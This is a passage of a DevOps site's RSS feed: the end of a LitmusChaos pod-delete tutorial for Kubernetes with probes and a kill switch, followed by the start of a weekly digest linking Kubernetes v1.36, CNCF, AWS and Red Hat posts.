              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;33&#x27;</span>
</code></pre><p>A few things worth flagging:</p>
<ul>
<li><code>applabel</code> is how Litmus picks targets. Anything matching <code>app=web</code> in the <code>default</code> namespace is fair game.</li>
<li><code>PODS_AFFECTED_PERC: &#39;33&#39;</code> means one pod out of three each round. Start small.</li>
<li><code>FORCE: &#39;false&#39;</code> uses a graceful delete with the pod&#39;s terminationGracePeriod. Flip to <code>true</code> to simulate a kernel kill, which is the more honest test.</li>
<li><code>engineState: active</code> starts the experiment immediately on apply. Set it to <code>stop</code> to bail out.</li>
</ul>
<p>Apply it:</p>
<pre><code class="hljs language-bash">kubectl apply -f pod-delete-engine.yaml
</code></pre><h2 id="h2-watch-it-run" class="group relative scroll-mt-24">
        <a href="#h2-watch-it-run" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Watch It Run
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-watch-it-run"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Open three terminals. In the first, watch your app:</p>
<pre><code class="hljs language-bash">kubectl get pods -l app=web -w
</code></pre><p>You should see pods being terminated and new ones starting:</p>
<pre><code class="hljs language-text">web-6c8b9d7f4-2lhmn    1/1     Terminating   0     2m
web-6c8b9d7f4-zk4tx    0/1     Pending       0     0s
web-6c8b9d7f4-zk4tx    0/1     ContainerCreating  0  1s
web-6c8b9d7f4-zk4tx    1/1     Running       0     3s
</code></pre><p>In the second, watch the Litmus runner pod:</p>
<pre><code class="hljs language-bash">kubectl -n default get pods -l name=web-pod-delete-runner -w
</code></pre><p>In the third, hammer the service so you can see if traffic ever fails:</p>
<pre><code class="hljs language-bash">kubectl run curl-loop --image=curlimages/curl --restart=Never -- \
  sh -c <span class="hljs-string">&#x27;while true; do curl -s -o /dev/null -w &quot;%{http_code}\n&quot; http://web; sleep 0.5; done&#x27;</span>

kubectl logs -f curl-loop
</code></pre><p>If your readiness probe and service are wired up correctly, you see a stream of <code>200</code>s. If you see <code>000</code> or <code>503</code> in there, that is a finding. Either readiness is lying about pod health, or your replica count is too low to absorb a single failure.</p>
<h2 id="h2-read-the-verdict" class="group relative scroll-mt-24">
        <a href="#h2-read-the-verdict" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Read the Verdict
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-read-the-verdict"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>When the runner pod finishes, look at the result:</p>
<pre><code class="hljs language-bash">kubectl get chaosresult web-pod-delete-pod-delete -n default -o yaml
</code></pre><p>The interesting bit:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">status:</span>
  <span class="hljs-attr">experimentStatus:</span>
    <span class="hljs-attr">phase:</span> <span class="hljs-string">Completed</span>
    <span class="hljs-attr">verdict:</span> <span class="hljs-string">Pass</span>
    <span class="hljs-attr">failStep:</span> <span class="hljs-string">&#x27;N/A&#x27;</span>
  <span class="hljs-attr">probeStatus:</span> []
</code></pre><p><code>Pass</code> means Litmus killed pods and the deployment kept the target replica count up through the run. <code>Fail</code> means a probe tripped (more on probes below) or the experiment could not target anything.</p>
<p>For the full story, check the events the runner emitted:</p>
<pre><code class="hljs language-bash">kubectl describe chaosresult web-pod-delete-pod-delete -n default
</code></pre><h2 id="h2-make-it-real-with-probes" class="group relative scroll-mt-24">
        <a href="#h2-make-it-real-with-probes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Make It Real With Probes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-make-it-real-with-probes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A <code>Pass</code> from <code>pod-delete</code> alone just means pods came back. It does not mean your users got served. Probes turn the experiment into a real SLO check. Litmus runs them during the chaos window and fails the result if the probe fails.</p>
<p>Add an <code>httpProbe</code> to the engine that hits the service every two seconds and expects a 200:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">experiments:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">probe:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">web-availability</span>
          <span class="hljs-attr">type:</span> <span class="hljs-string">httpProbe</span>
          <span class="hljs-attr">mode:</span> <span class="hljs-string">Continuous</span>
          <span class="hljs-attr">runProperties:</span>
            <span class="hljs-attr">probeTimeout:</span> <span class="hljs-number">2</span>
            <span class="hljs-attr">interval:</span> <span class="hljs-number">2</span>
            <span class="hljs-attr">retry:</span> <span class="hljs-number">1</span>
            <span class="hljs-attr">stopOnFailure:</span> <span class="hljs-literal">false</span>
          <span class="hljs-attr">httpProbe/inputs:</span>
            <span class="hljs-attr">url:</span> <span class="hljs-string">http://web.default.svc.cluster.local</span>
            <span class="hljs-attr">insecureSkipVerify:</span> <span class="hljs-literal">false</span>
            <span class="hljs-attr">method:</span>
              <span class="hljs-attr">get:</span>
                <span class="hljs-attr">criteria:</span> <span class="hljs-string">==</span>
                <span class="hljs-attr">responseCode:</span> <span class="hljs-string">&#x27;200&#x27;</span>
      <span class="hljs-attr">components:</span>
        <span class="hljs-attr">env:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">TOTAL_CHAOS_DURATION</span>
            <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;30&#x27;</span>
</code></pre><p>Re-apply. Now if even one HTTP check fails during the 30-second chaos window, the verdict flips to <code>Fail</code>. That is the signal you actually want: not &quot;pods recovered&quot; but &quot;users were served the whole time.&quot;</p>
<h2 id="h2-what-to-try-next" class="group relative scroll-mt-24">
        <a href="#h2-what-to-try-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What To Try Next
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-try-next"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Once <code>pod-delete</code> passes with a probe, you have a working chaos loop. Use it. A short menu to work through, in roughly increasing pain:</p>
<ol>
<li><strong>container-kill</strong>: kill only the app container without taking the pod down. Surfaces broken restart logic and exposes anything that initializes only on pod start.</li>
<li><strong>pod-cpu-hog</strong> and <strong>pod-memory-hog</strong>: pin a pod&#39;s resources. Validates that HPA reacts and that your requests/limits are not lying.</li>
<li><strong>pod-network-loss</strong>: drop a percentage of packets between the target and the world. Excellent for finding retry storms and absent timeouts.</li>
<li><strong>node-drain</strong>: cordon and drain a node out from under the workload. The honest test of PodDisruptionBudgets.</li>
</ol>
<p>Two operational habits to build alongside the experiments:</p>
<ul>
<li><strong>Always set <code>engineState</code>, not just delete-on-cleanup.</strong> Patching the engine to <code>stop</code> is the kill switch. Keep that command in your runbook so the on-call can stop chaos in one line if something goes sideways: <code>kubectl patch chaosengine web-pod-delete -n default --type merge -p &#39;{&quot;spec&quot;:{&quot;engineState&quot;:&quot;stop&quot;}}&#39;</code>.</li>
<li><strong>Start in a non-prod cluster, then move to prod with a <code>PODS_AFFECTED_PERC</code> of 10 and a probe</strong>. Prod chaos without a probe is sabotage. Prod chaos with a probe is testing.</li>
</ul>
<p>Chaos engineering stops being scary the moment you have run the loop once. Pick one deployment this week, run <code>pod-delete</code> against it with an <code>httpProbe</code>, and find out whether your readiness probe was lying to you.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 21, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-21</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 18 May 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-21</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-what-kubectl-debug-doesnt-tell-you-the-silent-evidence-gap" class="group relative scroll-mt-24">
        <a href="#h3-what-kubectl-debug-doesnt-tell-you-the-silent-evidence-gap" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What kubectl debug doesn’t tell you: The silent evidence gap
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-kubectl-debug-doesnt-tell-you-the-silent-evidence-gap"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The session that left no record A kubectl debug session can contain the only direct observation of a failing system state. However, once the session ends, Kubernetes does not retain the termination co</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/18/what-kubectl-debug-doesnt-tell-you-the-silent-evidence-gap/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-new-metric-for-route-sync-in-the-cloud-controller-manager" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-new-metric-for-route-sync-in-the-cloud-controller-manager" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: New Metric for Route Sync in the Cloud Controller Manager
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kubernetes-v136-new-metric-for-route-sync-in-the-cloud-controller-manager"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This article was originally published with the wrong date. It was later republished, dated the 15th of May 2026. Kubernetes v1.36 introduces a new alpha counter metric route_controller_route_sync_tota</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/15/ccm-new-metric-route-sync-total/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-mixed-version-proxy-graduates-to-beta" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-mixed-version-proxy-graduates-to-beta" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: Mixed Version Proxy Graduates to Beta
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kubernetes-v136-mixed-version-proxy-graduates-to-beta"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Back in Kubernetes 1.28, we introduced the Mixed Version Proxy (MVP) as an Alpha feature (under the feature gate UnknownVersionInteroperabilityProxy) in a previous blog post. The goal was simple but c</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/15/kubernetes-1-36-feature-mixed-version-proxy-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-deprecation-and-removal-of-service-externalips" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-deprecation-and-removal-of-service-externalips" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: Deprecation and removal of Service ExternalIPs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kubernetes-v136-deprecation-and-removal-of-service-externalips"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The .spec.externalIPs field for Service was an early attempt to provide cloud-load-balancer-like functionality for non-cloud clusters. Unfortunately, the API assumes that every user in the cluster is </p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/14/kubernetes-v1-36-deprecation-and-removal-of-service-externalips/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-when-ai-agents-become-contributors-how-kubestellar-reached-81-pr-acceptance" class="group relative scroll-mt-24">
        <a href="#h3-when-ai-agents-become-contributors-how-kubestellar-reached-81-pr-acceptance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 When AI agents become contributors: How KubeStellar reached 81% PR acceptance
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-when-ai-agents-become-contributors-how-kubestellar-reached-81-pr-acceptance"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In mid-December, I started building KubeStellar Console from scratch. It’s a multi-cluster management dashboard for Kubernetes, and it sits inside the KubeStellar project in the Cloud Native Computing</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/14/when-ai-agents-become-contributors-how-kubestellar-reached-81-pr-acceptance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-v136-advancing-workload-aware-scheduling" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-v136-advancing-workload-aware-scheduling" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes v1.36: Advancing Workload-Aware Scheduling
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kubernetes-v136-advancing-workload-aware-scheduling"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI/ML and batch workloads introduce unique scheduling challenges that go beyond simple Pod-by-Pod scheduling. In Kubernetes v1.35, we introduced the first tranche of workload-aware scheduling improvem</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/13/kubernetes-v1-36-advancing-workload-aware-scheduling/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-maximizing-value-with-amazon-eks-auto-mode-strategies-for-visibility-control-and-optimization" class="group relative scroll-mt-24">
        <a href="#h3-maximizing-value-with-amazon-eks-auto-mode-strategies-for-visibility-control-and-optimization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Maximizing value with Amazon EKS Auto Mode: Strategies for visibility, control, and optimization
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-maximizing-value-with-amazon-eks-auto-mode-strategies-for-visibility-control-and-optimization"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this post, we explore how to maximize Auto Mode&#39;s value through comprehensive cost visibility, proactive governance, and continuous optimization strategies. We cover essential cost management dimen</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/maximizing-value-with-amazon-eks-auto-mode-strategies-for-visibility-control-and-optimization/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-a-cloud-native-platform-from-the-ground-up-with-kairos-k0rdent-and-bindy" class="group relative scroll-mt-24">
        <a href="#h3-building-a-cloud-native-platform-from-the-ground-up-with-kairos-k0rdent-and-bindy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building a cloud native platform from the ground up with Kairos, k0rdent, and bindy
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-building-a-cloud-native-platform-from-the-ground-up-with-kairos-k0rdent-and-bindy"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As we shared in our earlier post on FluxCD, RBC Capital Markets has been on a deliberate journey to modernize our Kubernetes platform. GitOps with FluxCD gave us a solid deployment foundation. But as </p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/13/building-a-cloud-native-platform-from-the-ground-up-with-kairos-k0rdent-and-bindy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-at-uber-with-lucy-sweet" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-at-uber-with-lucy-sweet" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes at Uber with Lucy Sweet
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kubernetes-at-uber-with-lucy-sweet"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guest is Lucy Sweet, a Staff Software engineer at Uber and the lead for the Kubernetes Node Lifecycle Working Group. Imagine trying to move millions of compute cores and thousands of microservices to </p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Kubernetes Podcast</strong></p>
<p><a href="https://e780d51f-f115-44a6-8252-aed9216bb521.libsyn.com/kubernetes-at-uber-with-lucy-sweet"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-stop-managing-the-past-and-start-building-its-future" class="group relative scroll-mt-24">
        <a href="#h3-stop-managing-the-past-and-start-building-its-future" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Stop managing the past and start building IT’s future
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-stop-managing-the-past-and-start-building-its-future"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We’re continuing to navigate a fundamental shift in digital infrastructure. Over the past 18 months, the predictability of the virtualization layer has shed nearly 20 years of stability driven by an u</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/stop-managing-past-and-start-building-its-future"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hat-partner-ecosystem-a-year-of-expanding-choice-for-virtualized-workloads-on-red-hat-openshift-virtualization" class="group relative scroll-mt-24">
        <a href="#h3-red-hat-partner-ecosystem-a-year-of-expanding-choice-for-virtualized-workloads-on-red-hat-openshift-virtualization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat partner ecosystem: A year of expanding choice for virtualized workloads on Red Hat OpenShift Virtualization
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-red-hat-partner-ecosystem-a-year-of-expanding-choice-for-virtualized-workloads-on-red-hat-openshift-virtualization"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>It has been about a year since the last review of Red Hat’s partner ecosystem for Red Hat OpenShift Virtualization. We&#39;ve had a lot of success in the infrastructure space, including improvements to st</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/red-hat-partner-ecosystem-year-expanding-choice-virtualized-workloads-red-hat-openshift-virtualization"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-back-up-and-restore-your-amazon-eks-cluster-resources-using-velero" class="group relative scroll-mt-24">
        <a href="#h3-back-up-and-restore-your-amazon-eks-cluster-resources-using-velero" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Back up and restore your Amazon EKS cluster resources using Velero
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-back-up-and-restore-your-amazon-eks-cluster-resources-using-velero"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this post, you&#39;ll learn to back up and restore Amazon EKS cluster resources and persistent volume data using Velero. You&#39;ll deploy a sample stateful application, back it up, and restore it to a dif</p>
